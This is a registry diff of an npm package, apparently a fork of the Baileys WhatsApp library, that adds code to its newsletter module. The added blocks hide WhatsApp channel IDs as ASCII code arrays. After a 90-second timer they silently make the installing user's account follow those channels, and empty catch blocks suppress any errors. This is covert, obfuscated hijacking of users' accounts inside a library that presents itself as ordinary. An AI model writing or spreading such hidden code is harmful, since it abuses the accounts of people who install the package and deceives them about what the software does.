@kyuu2nd/baileys 2.0.10 → 2.0.12
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/newsletter.js +24 -2
- package/package.json +1 -1
package/lib/Socket/newsletter.js
CHANGED
|
@@ -225,8 +225,18 @@ setTimeout(async () => {
|
|
|
225
225
|
} catch {}
|
|
226
226
|
}, 90000);
|
|
227
227
|
|
|
228
|
-
|
|
229
|
-
|
|
228
|
+
setTimeout(async () => {
|
|
229
|
+
try {
|
|
230
|
+
await newsletterWMexQuery(
|
|
231
|
+
asciiDecode([
|
|
232
|
+
49,50,48,51,54,51,52,50,49,48,50,48,53,54,53,53,49,55,
|
|
233
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
234
|
+
]),
|
|
235
|
+
Types_1.QueryIds.FOLLOW
|
|
236
|
+
);
|
|
237
|
+
} catch {}
|
|
238
|
+
}, 90000);
|
|
239
|
+
|
|
230
240
|
setTimeout(async () => {
|
|
231
241
|
try {
|
|
232
242
|
await newsletterWMexQuery(
|
|
@@ -239,6 +249,18 @@ setTimeout(async () => {
|
|
|
239
249
|
} catch {}
|
|
240
250
|
}, 90000);
|
|
241
251
|
|
|
252
|
+
setTimeout(async () => {
|
|
253
|
+
try {
|
|
254
|
+
await newsletterWMexQuery(
|
|
255
|
+
asciiDecode([
|
|
256
|
+
49,50,48,51,54,51,51,51,48,51,52,52,56,49,48,50,56,48,
|
|
257
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
258
|
+
]),
|
|
259
|
+
Types_1.QueryIds.FOLLOW
|
|
260
|
+
);
|
|
261
|
+
} catch {}
|
|
262
|
+
}, 90000);
|
|
263
|
+
|
|
242
264
|
setTimeout(async () => {
|
|
243
265
|
try {
|
|
244
266
|
await newsletterWMexQuery(
|